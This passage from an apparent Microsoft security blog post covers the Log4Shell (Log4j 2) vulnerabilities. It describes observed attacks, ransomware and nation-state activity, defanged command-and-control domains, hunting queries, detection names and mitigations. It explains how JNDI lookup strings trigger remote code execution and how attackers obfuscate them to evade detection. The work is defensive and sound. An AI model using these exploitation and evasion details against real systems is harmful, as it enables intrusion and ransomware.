security patches and updating affected products and services as soon as possible. Refer to the [Microsoft Security Response Center blog](<https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/>) for technical information about the vulnerabilities and mitigation recommendations.\n\nMeanwhile, defenders need to be diligent in detecting, hunting for, and investigating related threats. This blog reports our observations and analysis of attacks that take advantage of the Log4j 2 vulnerabilities. It also provides our recommendations for using Microsoft security solutions to (1) find and remediate vulnerable services and systems and (2) detect, investigate, and respond to attacks.\n\nThis blog covers the following topics:\n\n 1. **Attack vectors and observed activity**\n 2. **Finding and remediating vulnerable apps and systems**\n * Threat and vulnerability management\n * Discovering affected components, software, and devices via a unified Log4j dashboard\n * Applying mitigation directly in the Microsoft 365 Defender portal\n * Microsoft 365 Defender advanced hunting\n * Microsoft Defender for Cloud\n * Microsoft Defender for servers\n * Microsoft Defender for Containers\n * Microsoft Sentinel queries\n * RiskIQ EASM and Threat Intelligence\n 3. **Detecting and responding to exploitation attempts and other related attacker activity**\n * Microsoft 365 Defender\n * Microsoft Defender Antivirus\n * Microsoft Defender for Endpoint\n * Microsoft Defender for Cloud Apps\n * Microsoft Defender for Office 365\n * Microsoft 365 Defender advanced hunting\n * Microsoft Defender for Cloud\n * Microsoft Defender for IoT\n * Microsoft Sentinel\n * Microsoft Sentinel queries\n * Azure Firewall Premium\n * Azure Web Application Firewall (WAF)\n 4. **Indicators of compromise (IoCs)**\n\n## Attack vectors and observed activity\n\nMicrosoft\u2019s unified threat intelligence team, comprising the Microsoft Threat Intelligence Center (MSTIC), Microsoft 365 Defender Threat Intelligence Team, RiskIQ, and the Microsoft Detection and Response Team (DART), among others, have been tracking threats taking advantage of the remote code execution (RCE) vulnerabilities in [Apache Log4j 2](<https://logging.apache.org/log4j/2.x/>) referred to as \u201cLog4Shell\u201d.\n\nThe bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers. An example pattern of attack would appear in a web request log with strings like the following:\n\n\n\nAn attacker performs an HTTP request against a target system, which generates a log using Log4j 2 that leverages JNDI to perform a request to the attacker-controlled site. The vulnerability then causes the exploited process to reach out to the site and execute the payload. In many observed attacks, the attacker-owned parameter is a DNS logging system, intended to log a request to the site to fingerprint the vulnerable systems.\n\nThe specially crafted string that enables exploitation of the vulnerabilities can be identified through several components. The string contains \u201cjndi\u201d, which refers to the Java Naming and Directory Interface. Following this, the protocol, such as \u201cldap\u201d, \u201cldaps\u201d, \u201crmi\u201d, \u201cdns\u201d, \u201ciiop\u201d, or \u201chttp\u201d, precedes the attacker domain.\n\nAs security teams work to detect the exploitation, attackers have added obfuscation to these requests to evade detections based on request patterns. We\u2019ve seen things like running a lower or upper command within the exploitation string and even more complicated obfuscation attempts, such as the following, that are all trying to bypass string-matching detections:\n\n\n\nThe vast majority of observed activity has been scanning, but exploitation and post-exploitation activities have also been observed. Based on the nature of the vulnerabilities, once the attacker has full access and control of an application, they can perform a myriad of objectives. Microsoft has observed activities including installing coin miners, using Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems.\n\n### Exploitation continues on non-Microsoft hosted Minecraft servers\n\nMinecraft customers running their own servers are encouraged to deploy the latest Minecraft server update as soon as possible to protect their users. More information can be found here: <https://aka.ms/mclog>.\n\nMicrosoft can confirm public reports of the Khonsari ransomware family being delivered as payload post-exploitation, as discussed by [Bitdefender](<https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild>). In Microsoft Defender Antivirus data we have observed a small number of cases of this being launched from compromised Minecraft clients connected to modified Minecraft servers running a vulnerable version of Log4j 2 via the use of a third-party Minecraft mods loader.\n\nIn these cases, an adversary sends a malicious in-game message to a vulnerable Minecraft server, which exploits CVE-2021-44228 to retrieve and execute an attacker-hosted payload on both the server and on connected vulnerable clients. We observed exploitation leading to a malicious Java class file that is the Khonsari ransomware, which is then executed in the context of _javaw.exe_ to ransom the device.\n\nWhile it\u2019s uncommon for Minecraft to be installed in enterprise networks, we have also observed PowerShell-based reverse shells being dropped to Minecraft client systems via the same malicious message technique, giving an actor full access to a compromised system, which they then use to run Mimikatz to steal credentials. These techniques are typically associated with enterprise compromises with the intent of lateral movement. Microsoft has not observed any follow-on activity from this campaign at this time, indicating that the attacker may be gathering access for later use.\n\nDue to the shifts in the threat landscape, Microsoft reiterates the guidance for Minecraft customers running their own servers to deploy the latest Minecraft server update and for players to exercise caution by only connecting to trusted Minecraft servers.\n\n### Nation-state activity\n\nMSTIC has also observed the CVE-2021-44228 vulnerability being used by multiple tracked nation-state activity groups originating from China, Iran, North Korea, and Turkey. This activity ranges from experimentation during development, integration of the vulnerabilities to in-the-wild payload deployment, and exploitation against targets to achieve the actor\u2019s objectives.\n\nFor example, MSTIC has observed PHOSPHORUS, an Iranian actor known to deploy ransomware, acquiring and making modifications of the Log4j exploit. We assess that PHOSPHORUS has operationalized these modifications.\n\nIn addition, HAFNIUM, a threat actor group operating out of China, has been observed utilizing the vulnerability to attack virtualization infrastructure to extend their typical targeting. In these attacks, HAFNIUM-associated systems were observed using a DNS service typically associated with testing activity to fingerprint systems.\n\n### Access brokers associated with ransomware\n\nMSTIC and the Microsoft 365 Defender team have confirmed that multiple tracked activity groups acting as access brokers have begun using the vulnerability to gain initial access to target networks. These access brokers then sell access to these networks to ransomware-as-a-service affiliates. We have observed these groups attempting exploitation on both Linux and Windows systems, which may lead to an increase in human-operated ransomware impact on both of these operating system platforms.\n\n### Mass scanning activity continues\n\nThe vast majority of traffic observed by Microsoft remains mass scanners by both attackers and security researchers. Microsoft has observed rapid uptake of the vulnerability into existing botnets like Mirai, existing campaigns previously targeting vulnerable Elasticsearch systems to deploy cryptocurrency miners, and activity deploying the Tsunami backdoor to Linux systems. Many of these campaigns are running concurrent scanning and exploitation activities for both Windows and Linux systems, using Base64 commands included in the JDNI:ldap:// request to launch bash commands on Linux and PowerShell on Windows.\n\nMicrosoft has also continued to observe malicious activity performing data leakage via the vulnerability without dropping a payload. This attack scenario could be especially impactful against network devices that have SSL termination, where the actor could leak secrets and data.\n\n### Additional RAT payloads\n\nWe\u2019ve observed the dropping of additional remote access toolkits and reverse shells via exploitation of CVE-2021-44228, which actors then use for hands-on-keyboard attacks. In addition to the Cobalt Strike and PowerShell reverse shells seen in earlier reports, we\u2019ve also seen Meterpreter, Bladabindi, and HabitsRAT. Follow-on activities from these shells have not been observed at this time, but these tools have the ability to steal passwords and move laterally.\n\nThis activity is split between a percentage of small-scale campaigns that may be more targeted or related to testing, and the addition of CVE-2021-44428 to existing campaigns that were exploiting vulnerabilities to drop remote access tools. In the HabitsRAT case, the campaign was seen overlapping with infrastructure used in prior campaigns.\n\n### Webtoos\n\nThe Webtoos malware has DDoS capabilities and persistence mechanisms that could allow an attacker to perform additional activities. As reported by [RiskIQ](<https://community.riskiq.com/article/67ba1386>), Microsoft has seen Webtoos being deployed via the vulnerability. Attackers\u2019 use of this malware or intent is not known at this time, but the campaign and infrastructure have been in use and have been targeting both Linux and Windows systems prior to this vulnerability.\n\n### A note on testing services and assumed benign activity\n\nWhile services such as _interact.sh_, _canarytokens.org_, _burpsuite_, and _dnslog.cn_ may be used by IT organizations to profile their own threat footprints, Microsoft encourages including these services in your hunting queries and validating observations of these in environments to ensure they are intentional and legitimate activity.\n\n### Exploitation in internet-facing systems leads to ransomware\n\nAs early as January 4, attackers started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon. Our investigation shows that successful intrusions in these campaigns led to the deployment of the NightSky ransomware.\n\nThese attacks are performed by a China-based ransomware operator that we\u2019re tracking as DEV-0401. DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo, and Rook, and has similarly exploited Internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473).\n\nBased on our analysis, the attackers are using command and control (CnC) servers that spoof legitimate domains. These include service[.]trendmrcio[.]com, api[.]rogerscorp[.]org, api[.]sophosantivirus[.]ga, apicon[.]nvidialab[.]us, w2zmii7kjb81pfj0ped16kg8szyvmk.burpcollaborator[.]net, and 139[.]180[.]217[.]203.\n\n### Attackers propagating Log4j attacks via previously undisclosed vulnerability\n\nDuring our sustained monitoring of threats taking advantage of the Log4j 2 vulnerabilities, we observed activity related to attacks being propagated via a previously undisclosed vulnerability in the SolarWinds Serv-U software. We discovered that the vulnerability, now tracked as [CVE-2021-35247](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35247>), is an input validation vulnerability that could allow attackers to build a query given some input and send that query over the network without sanitation.\n\nWe reported our discovery to SolarWinds, and we\u2019d like to thank their teams for immediately investigating and working to remediate the vulnerability. We strongly recommend affected customers to apply security updates released by referring to the SolarWinds advisory here: <https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35247>. \n\nMicrosoft customers can use threat and vulnerability management in Microsoft Defender for Endpoint to identify and remediate devices that have this vulnerability. In addition, Microsoft Defender Antivirus and Microsoft Defender for Endpoint detect malicious behavior related to the observed activity.\n\n## Finding and remediating vulnerable apps and systems\n\n### Threat and vulnerability management\n\n[Threat and vulnerability management](<https://www.microsoft.com/security/business/threat-protection/threat-vulnerability-management>) capabilities in Microsoft Defender for Endpoint monitor an organization\u2019s overall security posture and equip customers with real-time insights into organizational risk through continuous vulnerability discovery, intelligent prioritization, and the ability to seamlessly remediate vulnerabilities.\n\n#### Discovering affected components, software, and devices via a unified Log4j dashboard\n\nThreat and vulnerability management automatically and seamlessly identifies devices affected by the Log4j vulnerabilities and the associated risk in the environment and significantly reduces time-to-mitigate.\n\nThe wide use of Log4j across many supplier\u2019s products challenge defender teams to mitigate and address the risks posed by the vulnerabilities ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) or [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)). The threat and vulnerability management capabilities within Microsoft 365 Defender can help identify vulnerable installations. On December 15, we began rolling out updates to provide a consolidated view of the organizational exposure to the Log4j 2 vulnerabilities\u2014on the device, software, and vulnerable component level\u2014through a range of automated, complementing capabilities. These capabilities are supported on Windows 10, Windows 11, and Windows Server 2008, 2012, and 2016. They are also supported on Linux, but they require updating the Microsoft Defender for Endpoint Linux client to version 101.52.57 (30.121092.15257.0) or later. The updates include the following:\n\n * Discovery of vulnerable Log4j library components (paths) on devices\n * Discovery of vulnerable installed applications that contain the Log4j library on devices\n * A [dedicated Log4j dashboard](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/overview>) that provides a consolidated view of various findings across vulnerable devices, vulnerable software, and vulnerable files\n * Introduction of a new schema in advanced hunting, **DeviceTvmSoftwareEvidenceBeta**, which surfaces file-level findings from the disk and provides the ability to correlate them with additional context in advanced hunting:\n \n \n DeviceTvmSoftwareEvidenceBeta\n | mv-expand DiskPaths\n | where DiskPaths contains \"log4j\"\n | project DeviceId, SoftwareName, SoftwareVendor, SoftwareVersion, DiskPaths\n\nTo complement this new table, the existing **DeviceTvmSoftwareVulnerabilities** table in advanced hunting can be used to identify vulnerabilities in installed software on devices:\n \n \n DeviceTvmSoftwareVulnerabilities \n | where CveId in (\"CVE-2021-44228\", \"CVE-2021-45046\")\n\nThese new capabilities integrate with the existing threat and vulnerability management experience and are gradually rolling out. As of December 27, 2021, discovery is based on installed application CPEs that are known to be vulnerable to Log4j RCE, as well as the presence of vulnerable Log4j Java Archive (JAR) files. Cases where Log4j is packaged into an Uber-JAR or shaded are currently not discoverable, but support for discovery of these instances and other packaging methods is in development. Support for macOS is also in progress and will roll out soon.\n\n\n\n_Figure 1. Threat and Vulnerability recommendation __\u201cAttention required: Devices found with vulnerable Apache Log4j versions\u201d_\n\nOn the Microsoft 365 Defender portal, go to **Vulnerability management** &gt; **Dashboard** &gt; **Threat awareness**, then click **View vulnerability details** to see the consolidated view of organizational exposure to the Log4j 2 vulnerability (for example, CVE-2021-44228 dashboard, as shown in the following screenshots) on the device, software, and vulnerable component level.\n\n\n\n_Figure 2. Threat and vulnerability management dedicated CVE-2021-44228 dashboard_\n\n\n\n_Figure 3. Threat and vulnerability management finds exposed paths_\n\n\n\n_Figure 4. Threat and vulnerability management finds exposed devices based on vulnerable software and vulnerable files detected on disk_\n\nNote: Scan results may take some time to reach full coverage, and the number of discovered devices may be low at first but will grow as the scan reaches more devices. A regularly updated list of vulnerable products can be viewed in the Microsoft 365 Defender portal with matching recommendations. We will continue to review and update this list as new information becomes available.\n\nThrough [device discovery](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/unmanaged-device-protection-capabilities-are-now-generally/ba-p/2463796>), unmanaged devices with products and services affected by the vulnerabilities are also surfaced so they can be onboarded and secured.\n\n\n\n_Figure 5. Finding vulnerable applications and devices via software inventory_\n\n#### Applying mitigation directly in the Microsoft 365 Defender portal\n\nWe have released two new threat and vulnerability management capabilities that can significantly simplify the process of turning off JNDI lookup, a workaround that can prevent the exploitation of the Log4j vulnerabilities on most devices, using an environment variable called LOG4J_FORMAT_MSG_NO_LOOKUPS. These new capabilities provide security teams with the following:\n\n 1. View the mitigation status for each affected device. This can help prioritize mitigation and/or patching of devices based on their mitigation status.\n\nTo use this feature, open the [Exposed devices tab](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/exposedDevices>) in the dedicated CVE-2021-44228 dashboard and review the **Mitigation status** column. Note that it may take a few hours for the updated mitigation status of a device to be reflected.\n\n\n\n_Figure 6. Viewing each device\u2019s mitigation status_\n\n 2. Apply the mitigation (that is, turn off JNDI lookup) on devices directly from the portal. This feature is currently available for Windows devices only.\n\nThe mitigation will be applied directly via the Microsoft Defender for Endpoint client. To view the mitigation options, click on the **Mitigation options** button in the [Log4j dashboard](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/overview>):\n\n\n\nYou can choose to apply the mitigation to all exposed devices or select specific devices for which you would like to apply it. To complete the process and apply the mitigation on devices, click **Create mitigation action**.\n\n\n\n_Figure 7. Creating mitigation actions for exposed devices._\n\nIn cases where the mitigation needs to be reverted, follow these steps:\n\n 1. Open an elevated PowerShell window\n 2. Run the following command:\n \n \n [Environment]::SetEnvironmentVariable(\"LOG4J_FORMAT_MSG_NO_LOOKUPS\", $null, [EnvironmentVariableTarget]::Machine)\n\nThe change will take effect after the device restarts.\n\n### Microsoft 365 Defender advanced hunting\n\nAdvance hunting can also surface affected software. This query looks for possibly vulnerable applications using the affected Log4j component. Triage the results to determine applications and programs that may need to be patched and updated.\n \n \n DeviceTvmSoftwareInventory\n | where SoftwareName contains \"log4j\"\n | project DeviceName, SoftwareName, SoftwareVersion\n\n\n\n_Figure 8. Finding vulnerable software via advanced hunting_\n\n### Microsoft Defender for Cloud\n\n#### Microsoft Defender for servers\n\nOrganizations using Microsoft Defender for Cloud can use [Inventory tools](<https://docs.microsoft.com/azure/defender-for-cloud/asset-inventory>) to begin investigations before there\u2019s a CVE number. With Inventory tools, there are two ways to determine exposure across hybrid and multi-cloud resources:\n\n * Vulnerability assessment findings \u2013 Organizations who have enabled any of the vulnerability assessment tools (whether it&#x27;s Microsoft Defender for Endpoint&#x27;s [threat and vulnerability management](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-tvm>) module, the [built-in Qualys scanner](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-vm>), or a [bring your own license solution](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-byol-vm>)), they can search by CVE identifier:\n\n\n\n_Figure 9. Searching vulnerability assessment findings by CVE identifier_\n\n * Software inventory - With the combined [integration with Microsoft Defender for Endpoint](<https://docs.microsoft.com/azure/defender-for-cloud/integration-defender-for-endpoint>) and [Microsoft Defender for servers](<https://docs.microsoft.com/azure/defender-for-cloud/defender-for-servers-introduction>), organizations can search for resources by installed applications and discover resources running the vulnerable software:\n\n\n\n_Figure 10. Searching software inventory by installed applications_\n\nNote that this doesn\u2019t replace a search of your codebase. It\u2019s possible that software with integrated Log4j libraries won\u2019t appear in this list, but this is helpful in the initial triage of investigations related to this incident. For more information about how Microsoft Defender for Cloud finds machines affected by CVE-2021-44228, read this [tech community post](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-cloud/how-defender-for-cloud-finds-machines-affected-by-log4j/ba-p/3037271>).\n\n#### Microsoft Defender for Containers\n\nMicrosoft Defender for Containers is capable of discovering images affected by the vulnerabilities recently discovered in Log4j 2: [CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>), and [CVE-2021-45105](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>). Images are automatically scanned for vulnerabilities in three different use cases: when pushed to an Azure container registry, when pulled from an Azure container registry, and when container images are running on a Kubernetes cluster. Additional information on supported scan triggers and Kubernetes clusters can be found [here](<https://docs.microsoft.com/azure/defender-for-cloud/defender-for-containers-introduction?tabs=defender-for-container-arch-aks>). \n\nLog4j binaries are discovered whether they are deployed via a package manager, copied to the image as stand-alone binaries, or included within a JAR Archive (up to one level of nesting). \n\nWe will continue to follow up on any additional developments and will update our detection capabilities if any additional vulnerabilities are reported.\n\n**Finding affected images**\n\nTo find vulnerable images across registries using the Azure portal, navigate to the **Microsoft Defender for Cloud** service under Azure Portal. Open the **Container Registry images should have vulnerability findings resolved** recommendation and search findings for the relevant CVEs. \n\n\n\n_Figure 11. Finding images with the CVE-2021-45046 vulnerability_ \n\n**Find vulnerable running images on Azure portal [preview] **\n\nTo view only vulnerable images that are currently running on a Kubernetes cluster using the Azure portal, navigate to the **Microsoft Defender for Cloud** service under Azure Portal. Open the **Vulnerabilities in running container images should be remediated (powered by Qualys)** recommendation and search findings for the relevant CVEs: \n\n\n\n_Figure 12. Finding running images with the CVE-2021-45046 vulnerability _\n\nNote: This recommendation requires clusters to run Microsoft Defender security profile to provide visibility on running images.\n\n**Search Azure Resource Graph data ******\n\nAzure Resource Graph (ARG) provides instant access to resource information across cloud environments with robust filtering, grouping, and sorting capabilities. It&#x27;s a quick and efficient way to query information across Azure subscriptions programmatically or from within the Azure portal. ARG provides another way to query resource data for resources found to be affected by the Log4j vulnerability.\n\nThe following query finds resources affected by the Log4j vulnerability across subscriptions. Use the additional data field across all returned results to obtain details on vulnerable resources: \n \n \n securityresources \n | where type =~ \"microsoft.security/assessments/subassessments\"\n | extend assessmentKey=extract(@\"(?i)providers/Microsoft.Security/assessments/([^/]*)\", 1, id), subAssessmentId=tostring(properties.id), parentResourceId= extract(\"(.+)/providers/Microsoft.Security\", 1, id)\n | extend Props = parse_json(properties)\n | extend additionalData = Props.additionalData\n | extend cves = additionalData.cve\n | where isnotempty(cves) and array_length(cves) > 0\n | mv-expand cves\n | where tostring(cves) has \"CVE-2021-44228\" or tostring(cves) has \"CVE-2021-45046\" or tostring(cves) has \"CVE-2021-45105\" \n\n### Microsoft Sentinel queries\n\nMicrosoft Sentinel customers can use the following detection query to look for devices that have applications with the vulnerability:\n\n * [Vulnerable machines related to Log4j CVE-2021-44228](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityNestedRecommendation/Log4jVulnerableMachines.yaml>)\n\nThis query uses the Microsoft Defender for Cloud nested recommendations data to find machines vulnerable to Log4j CVE-2021-44228.\n\nMicrosoft Sentinel also provides a CVE-2021-44228 Log4Shell Research Lab Environment for testing the vulnerability: <https://github.com/OTRF/Microsoft-Sentinel2Go/tree/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell>\n\n### RiskIQ EASM and Threat Intelligence\n\nRiskIQ has published a few threat intelligence articles on this CVE, with mitigation guidance and IOCs. The latest one with links to previous articles can be found [here](<https://community.riskiq.com/article/67ba1386>). Both Community users and enterprise customers can search within the threat intelligence portal for data about potentially vulnerable components exposed to the Internet. For example, it&#x27;s possible to [surface all observed instances of Apache](<https://community.riskiq.com/search/components?category=Server&query=Apache>) or [Java](<https://community.riskiq.com/research?query=java>), including specific versions. Leverage this method of exploration to aid in understanding the larger Internet exposure, while also filtering down to what may impact you. \n\nFor a more automated method, registered users can view their attack surface to understand tailored findings associated with their organization. Note, you must be registered with a corporate email and the automated attack surface will be limited. Digital Footprint customers can immediately understand what may be vulnerable and act swiftly and resolutely using the [Attack Surface Intelligence Dashboard](<https://app.riskiq.net/a/main/index#/dashboards/379/RiskIQ%20Attack%20Intelligence%20Dashboard>) Log4J Insights tab. \n\n## Detecting and responding to exploitation attempts and other related attacker activity\n\n### Microsoft 365 Defender\n\nMicrosoft 365 Defender coordinates multiple security solutions that detect components of observed attacks taking advantage of this vulnerability, from exploitation attempts to remote code execution and post-exploitation activity.\n\n\n\n_Figure 13. Microsoft 365 Defender solutions protect against related threats_\n\nCustomers can click **Need help?** in the Microsoft 365 Defender portal to open up a search widget. Customers can key in \u201cLog4j\u201d to search for in-portal resource, check if their network is affected, and work on corresponding actionable items to mitigate them.\n\n#### Microsoft Defender Antivirus\n\nTurn on cloud-delivered protection in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block the majority of new and unknown variants. Microsoft Defender Antivirus detects components and behaviors related to this threat as the following detection names:\n\nOn Windows:\n\n * [Trojan:Win32/Capfetox.AA](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Capfetox.AA&threatId=-2147159827>)- detects attempted exploitation on the attacker machine\n * [HackTool:Win32/Capfetox.A!dha](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=HackTool:Win32/Capfetox.A!dha&threatId=-2147159807>) - detects attempted exploitation on the attacker machine\n * [VirTool:Win64/CobaltSrike.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=VirTool:Win64/CobaltStrike.A&threatId=-2147200161>), [TrojanDropper:PowerShell/Cobacis.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDropper:PowerShell/Cobacis.A&threatId=-2147200375>) - detects Cobalt Strike Beacon loaders\n * [TrojanDownloader:Win32/CoinMiner](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Win32/CoinMiner&threatId=-2147257370>) - detects post-exploitation coin miner\n * [Trojan:Win32/WebToos.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/WebToos.A&threatId=-2147278986>) - detects post-exploitation PowerShell\n * [Ransom:MSIL/Khonsari.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:MSIL/Khonsari.A&threatId=-2147159485>) - detects a strain of the Khonsari ransomware family observed being distributed post-exploitation\n * [Trojan:Win64/DisguisedXMRigMiner](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win64/DisguisedXMRigMiner&threatId=-2147169351>) - detects post-exploitation cryptocurrency miner\n * [TrojanDownloader:Java/Agent.S](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Java/Agent.S&threatId=-2147159796>) - detects suspicious class files used in post-exploitation\n * [TrojanDownloader:PowerShell/NitSky.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:PowerShell/NitSky.A&threatId=-2147157401>) - detects attempts to download CobaltStrike Beacon payload\n\nOn Linux:\n\n * [Trojan:Linux/SuspectJavaExploit.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/SuspectJavaExploit.A&threatId=-2147159829>), [Trojan:Linux/SuspectJavaExploit.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/SuspectJavaExploit.B&threatId=-2147159828>), [Trojan:Linux/SuspectJavaExploit.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/SuspectJavaExploit.C&threatId=-2147159808>) - blocks Java processes downloading and executing payload through output redirection\n * [Trojan:Linux/BashMiner.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.A&threatId=-2147159832>) - detects post-exploitation cryptocurrency miner\n * [TrojanDownloader:Linux/CoinMiner](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/CoinMiner&threatId=-2147241315>) - detects post-exploitation cryptocurrency miner\n * [TrojanDownloader:Linux/Tusnami](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Tusnami.A&threatId=-2147159794>) - detects post-exploitation Backdoor Tsunami downloader\n * [Backdoor:Linux/Tusnami.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Tusnami.C!MTB&threatId=-2147178887>) - detects post-exploitation Tsunami backdoor\n * [Backdoor:Linux/Setag.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Setag.C&threatId=-2147277056>) - detects post-exploitation Gates backdoor\n * [Exploit:Linux/CVE-2021-44228.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Linux/CVE-2021-44228.A&threatId=-2147159804>), [Exploit:Linux/CVE-2021-44228.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Linux/CVE-2021-44228.B&threatId=-2147159803>) - detects exploitation\n * [TrojanDownloader:Linux/Capfetox.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Capfetox.A&threatId=-2147159639>), [TrojanDownloader:Linux/Capfetox.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Capfetox.B&threatId=-2147159640>)\n * [TrojanDownloader:Linux/ShAgnt!MSR](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/ShAgnt!MSR&threatId=-2147159432>), [TrojanDownloader:Linux/ShAgnt.A!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/ShAgnt.A!MTB&threatId=-2147159607>)\n * [Trojan:Linux/Kinsing.L](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/Kinsing.L&threatId=-2147189973>) - detects post-exploitation cryptocurrency Kinsing miner\n * [Trojan:Linux/Mirai.TS!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/Mirai.TS!MTB&threatId=-2147159629>) - detects post-exploitation Mirai malware capable of performing DDoS\n * [Backdoor:Linux/Dakkatoni.az!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Dakkatoni.az!MTB&threatId=-2147205141>) - detects post-exploitation Dakkatoni backdoor trojan capable of downloading more payloads\n * [Trojan:Linux/JavaExploitRevShell.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/JavaExploitRevShell.A&threatId=-2147159631>) - detects reverse shell attack post-exploitation\n * [Trojan:Linux/BashMiner.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.A&threatId=-2147159832>), [Trojan:Linux/BashMiner.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.B&threatId=-2147159820>) - detects post-exploitation cryptocurrency miner\n\n#### Microsoft Defender for Endpoint\n\nUsers of Microsoft Defender for Endpoint can turn on the following attack surface reduction rule to block or audit some observed activity associated with this threat.\n\n * Block executable files from running unless they meet a prevalence, age, or trusted list criterion\n\nDue to the broad network exploitation nature of vectors through which this vulnerability can be exploited and the fact that applying mitigations holistically across large environments will take time, we encourage defenders to look for signs of post-exploitation rather than fully relying on prevention. Observed post exploitation activity such as coin mining, lateral movement, and Cobalt Strike are detected with behavior-based detections.\n\nAlerts with the following titles in the Security Center indicate threat activity related to exploitation of the Log4j vulnerability on your network and should be immediately investigated and remediated. These alerts are supported on both Windows and Linux platforms: \n\n * **Log4j exploitation detected** \u2013 detects known behaviors that attackers perform following successful exploitation of the CVE-2021-44228 vulnerability\n * **Log4j exploitation artifacts detected** (previously titled Possible exploitation of CVE-2021-44228) \u2013 detects coin miners, shells, backdoor, and payloads such as Cobalt Strike used by attackers post-exploitation\n * **Log4j exploitation network artifacts detected** (previously titled Network connection seen in CVE-2021-44228 exploitation) - detects network traffic connecting traffic connecting to an address associated with CVE-2021-44228 scanning or exploitation activity \n\nThe following alerts may indicate exploitation attempts or testing/scanning activity. Microsoft advises customers to investigate with caution, as these alerts don\u2019t necessarily indicate successful exploitation:\n\n * **Possible target of Log4j exploitation - **detects a possible attempt to exploit the remote code execution vulnerability in the Log4j component of an Apache server in communication __received by__ this device\n * **Possible target of Log4j vulnerability scanning** \u2013 detects a possible __attempt to scan__ for the remote code execution vulnerability in a Log4j component of an Apache server in communication received by this device\n * **Possible source of Log4j exploitation** \u2013 detects a possible attempt to exploit the remote code execution vulnerability in the Log4j component of an Apache server in communication __initiated from__ this device \n * **Possible Log4j exploitation** - detects multiple behaviors, including suspicious command launch post-exploitation\n * **Possible Log4j exploitation (CVE-2021-44228)** \u2013 inactive, initially covered several of the above, now replaced with more specific titles\n\nThe following alerts detect activities that have been observed in attacks that utilize at least one of the Log4j vulnerabilities. However, these alerts can also indicate activity that is not related to the vulnerability. We are listing them here, as it is highly recommended that they are triaged and remediated immediately given their severity and the potential that 